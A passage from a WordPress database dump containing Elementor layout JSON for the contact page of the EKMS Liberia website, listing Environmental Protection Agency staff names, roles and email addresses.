et_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n\\nEIA Manager, FDA\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14748,2339,'_elementor_edit_mode','builder'),(14749,2339,'_elementor_template_type','wp-page'),(14750,2339,'_elementor_version','2.7.5'),(14751,2339,'_wp_page_template','default'),(14752,2339,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a 